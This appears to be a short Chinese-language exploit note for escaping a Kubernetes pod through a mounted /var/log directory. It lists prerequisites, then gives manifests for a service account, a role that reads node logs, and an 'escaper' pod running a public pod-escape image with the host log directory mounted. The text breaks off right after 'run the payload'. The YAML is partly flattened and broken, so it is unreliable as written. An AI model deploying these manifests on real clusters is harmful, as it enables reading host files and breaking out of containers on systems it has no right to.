利用前置
1.root用户
2.有serviceaccount读取log
3. 挂载var log目录
apiVersion: v1
kind: ServiceAccount
metadata:name: logger
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:name: user-log-reader
rules:
- apiGroups: [""]resources:- nodes/logverbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:name: user-log-reader
roleRef:apiGroup: rbac.authorization.k8s.iokind: ClusterRolename: user-log-reader
subjects:
- kind: ServiceAccountname: loggernamespace: default
---
apiVersion: v1
kind: Pod
metadata:name: escaper
spec:serviceAccountName: loggercontainers:- name: escaperimage: danielsagi/kube-pod-escapevolumeMounts:- name: logsmountPath: /var/log/hostvolumes:- name: logshostPath:path: /var/log/type: Directory
运行payload,可以看到如下内容
<